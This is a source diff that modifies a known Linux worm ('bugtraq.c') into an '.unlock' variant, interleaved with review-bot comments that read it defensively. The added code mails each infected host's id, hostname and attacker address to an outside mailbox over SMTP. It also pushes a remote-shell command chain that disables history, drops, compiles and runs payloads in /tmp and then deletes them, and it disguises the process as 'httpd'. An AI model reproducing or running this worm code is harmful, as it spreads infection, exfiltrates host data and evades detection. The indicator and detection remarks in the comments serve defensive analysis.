--- bugtraq.c.txt Wed Sep 25 19:13:09 2002
+++ .unlock.c Fri Sep 20 15:28:10 2002
@@ -35,6 +35,7 @@
 * form. It is not the authors fault if it was used for any purposes *
 * other than educational. *
 * *
+ * some modification done by aion (aion@ukr.net) *
 ****************************************************************************/
 #include
@@ -62,12 +63,71 @@
 #define BROADCASTS 2
 #define LINKS 128
 #define CLIENTS 128
-#define PORT 2002
+#define PORT 4156
 #define SCANPORT 80
 #define SCANTIMEOUT 5
 #define MAXPATH 4096
 #define ESCANPORT 10100
-#define VERSION 12092002
+#define VERSION 20092002
+
+//////////////////////////////////////////////////////////////////////////////////////
+// aion //
+//////////////////////////////////////////////////////////////////////////////////////
+#define MAILSRV "freemail.ukr.net"
+#define MAILTO "aion@ukr.net"
+#define PSNAME "httpd "
+#define WORMSRC "/tmp/.unlock"
+#define UUHEAD "begin 655 .unlock\n"
+
+int writem(int, char *);
+
+int zhdr(int flag)
+{
+ int fd; char *gzh="\x1f\x8b\x08";
+ char *kgz="\x00\x00\x00";
+ if((fd=open(WORMSRC,O_WRONLY))==-1) return -1;
+ if(flag) write(fd,gzh,3);
+ else write(fd,kgz,3);
+ close(fd);
+}
+
+int mailme(char *sip)
+{
+ char cmdbuf[256], buffer[128];
+ int pip; long inet;
+ struct sockaddr_in sck;
+ struct hostent *hp;
+
+ if(!(pip=socket(PF_INET, SOCK_STREAM, 0))) return -1;
+ if((inet=inet_addr(MAILSRV))==-1)
+ {
+ if(hp=gethostbyname(MAILSRV))
+ memcpy (&inet, hp->h_addr, 4);
+ else return -1;
+ }
+ sck.sin_family = PF_INET;
+ sck.sin_port = htons (25);
+ sck.sin_addr.s_addr = inet;
+ if(connect(pip, (struct sockaddr *) &sck, sizeof (sck))<0) return -1;
+
+ gethostname(buffer,128);
+ sprintf(cmdbuf,"helo test\r\n"); writem(pip, cmdbuf);
+ recv(pip,cmdbuf,sizeof(cmdbuf),0);
+ sprintf(cmdbuf,"mail from: test@microsoft.com\r\n"); writem(pip, cmdbuf);
+ recv(pip,cmdbuf,sizeof(cmdbuf),0);
+ sprintf(cmdbuf,"rcpt to: "MAILTO"\r\n"); writem(pip, cmdbuf);
+ recv(pip,cmdbuf,sizeof(cmdbuf),0);
+ sprintf(cmdbuf,"data\r\n"); writem(pip, cmdbuf);
+ recv(pip,cmdbuf,sizeof(cmdbuf),0);
+ sprintf(cmdbuf," hostid: %d \r\n"
+ " hostname: %s \r\n"
+ " att_from: %s \r\n",gethostid(),buffer,sip);
+ writem(pip, cmdbuf);
+ recv(pip,cmdbuf,sizeof(cmdbuf),0);
+ sprintf(cmdbuf,"\r\n.\r\nquit\r\n"); writem(pip, cmdbuf);
+ recv(pip,cmdbuf,sizeof(cmdbuf),0);
+ return close(pip);
+}
 //////////////////////////////////////////////////////////////////////////////////////
 // Macros //
@@ -1136,8 +1196,8 @@
 register char *p;
 char buf[80];
 FILE *in;
- if ((in=fopen("/tmp/.bugtraq.c","r")) == NULL) return 0;
- writem(a,"begin 655 .bugtraq.c\n");
+ if ((in=fopen(WORMSRC,"r")) == NULL) return 0;
+ writem(a,UUHEAD);
 while ((n = fread(buf, 1, 45, in))) {
 ch = ENC(n);
 if (sendch(a,ch) <= ASUCCESS) break;
@@ -1346,14 +1406,26 @@
 int maxfd, n;
 alarm(3600);
- writem(sockfd,"TERM=xterm; export TERM=xterm; exec bash -i\n");
- writem(sockfd,"rm -rf /tmp/.bugtraq.c;cat > /tmp/.uubugtraq << __eof__;\n");
+ conv(localip,256,myip); memset(rcv,0,1024);
+// aion
+ writem(sockfd,"export TERM=xterm;export HOME=/tmp;export HISTFILE=/dev/null;"
+ "export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin;"
+ "exec bash -i\n");
+ writem(sockfd,"rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c "
+ " /tmp/httpd /tmp/update /tmp/.unlock; \n");
+ writem(sockfd,"cat > /tmp/.unlock.uu << __eof__; \n");
+ zhdr(1);
 encode(sockfd);
+ zhdr(0);
 writem(sockfd,"__eof__\n");
- conv(localip,256,myip);
- memset(rcv,0,1024);
- sprintf(rcv,"/usr/bin/uudecode -o /tmp/.bugtraq.c /tmp/.uubugtraq;gcc -o /tmp/.bugtraq /tmp/.bugtraq.c -lcrypto;/tmp/.bugtraq %s;exit;\n",localip);
- writem(sockfd,rcv);
+ writem(sockfd,"uudecode -o /tmp/.unlock /tmp/.unlock.uu; "
+ "tar xzf /tmp/.unlock -C /tmp/; "
+ "gcc -o /tmp/httpd /tmp/.unlock.c -lcrypto; "
+ "gcc -o /tmp/update /tmp/.update.c;\n");
+ sprintf(rcv, "/tmp/httpd %s; /tmp/update; \n",localip);
+ writem(sockfd,rcv); sleep(3);
+ writem(sockfd,"rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c "
+ " /tmp/httpd /tmp/update; exit; \n");
 for (;;) {
 FD_ZERO(&rset);
 FD_SET(sockfd, &rset);
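Review bot: The block added under the `aion` banner in the `@@ -62,12 +63,71 @@` hunk carries the values that distinguish this variant, and none of them is documented: PORT changes from 2002 to 4156, the payload path becomes `/tmp/.unlock`, PSNAME is `"httpd "` with a trailing space, and `mailme()` connects to TCP port 25 on MAILSRV and sends the host id, the hostname and the address passed in as `sip`. In an analysis copy I would add above the defines `/* variant indicators: PORT 4156, /tmp/.unlock, outbound SMTP to MAILSRV at start-up */`. `zhdr()` rewrites only the first three bytes of WORMSRC, switching between the gzip magic `1f 8b 08` and zeros, so the file left on disk will not be recognised as gzip by magic-based tools; that deserves its own line, e.g. `/* flag=0 zeroes the gzip magic of /tmp/.unlock, flag=1 restores it */`. On a web server that has no reason to originate SMTP, egress filtering can block this notification and alert on it.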
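Review bot: The command sequence written to the remote shell in the `@@ -1346,14 +1406,26 @@` hunk has no comment stating what it leaves behind on the target, which is the first thing an incident responder needs from this function. From the visible strings it sets `HISTFILE=/dev/null`, stages `/tmp/.unlock.uu`, unpacks `/tmp/.unlock.c` and `/tmp/.update.c`, builds and starts `/tmp/httpd` and `/tmp/update`, and then removes everything except `/tmp/.unlock`; the started processes would presumably keep running from unlinked binaries. I would record that as `/* residue on target: /tmp/.unlock only; /tmp/httpd and /tmp/update are deleted after start */`. The chain needs `uudecode`, `tar` and `gcc` to be available to the compromised account, so a web-server user invoking them on paths under /tmp is a usable detection, and removing the compiler or mounting /tmp noexec breaks this step. The enclosing function begins and ends outside the hunk.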
@@ -1694,9 +1766,7 @@
 //////////////////////////////////////////////////////////////////////////////////////
 int main(int argc, char **argv) {
-#ifdef SCAN
 unsigned char a=0,b=0,c=0,d=0;
-#endif
 unsigned long bases,*cpbases;
 struct initsrv_rec initrec;
 int null=open("/dev/null",O_RDWR);
@@ -1726,18 +1796,16 @@
 relay(cpbases[bases-1],(char*)&initrec,sizeof(struct initsrv_rec));
 }
 numlinks=0;
- dup2(null,0);
- dup2(null,1);
- dup2(null,2);
+ dup2(null,0); dup2(null,1); dup2(null,2);
 if (fork()) return 1;
-#ifdef SCAN
- a=classes[rand()%(sizeof classes)];
- b=rand();
- c=0;
- d=0;
-#endif
- signal(SIGCHLD,nas);
- signal(SIGHUP,nas);
+// aion
+ mailme(argv[1]); zhdr(0);
+ for(a=0;argv[0][a]!=0;a++) argv[0][a]=0;
+ for(a=0;argv[1][a]!=0;a++) argv[1][a]=0;
+ strcpy(argv[0],PSNAME);
+
+ a=classes[rand()%(sizeof classes)]; b=rand(); c=0; d=0;
+ signal(SIGCHLD,nas); signal(SIGHUP,nas);
 while (1) {
 static unsigned long timeout=0,timeout2=0,timeout3=0;
 char buf_[3000],*buf=buf_;
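Review bot: The lines added after `fork()` in the `@@ -1726,18 +1796,16 @@` hunk disguise the process and carry no comment saying so: `argv[0]` and `argv[1]` are zeroed and PSNAME (`"httpd "`) is copied over `argv[0]`, so a process listing built from the command line shows an httpd entry and no longer shows the address that was passed as the argument. Suggested comment: `/* masks the command line as "httpd "; identify this process by its executable path, not its name */`. With the `#ifdef SCAN` guards removed here and in the `@@ -1694,9 +1766,7 @@` hunk, the scan initialisation is now always compiled in. Since stdio is also redirected to /dev/null just above, name-based process monitoring will miss this; comparing each httpd process's executable link with the installed web-server binary is the more reliable check. `main` continues outside the hunk.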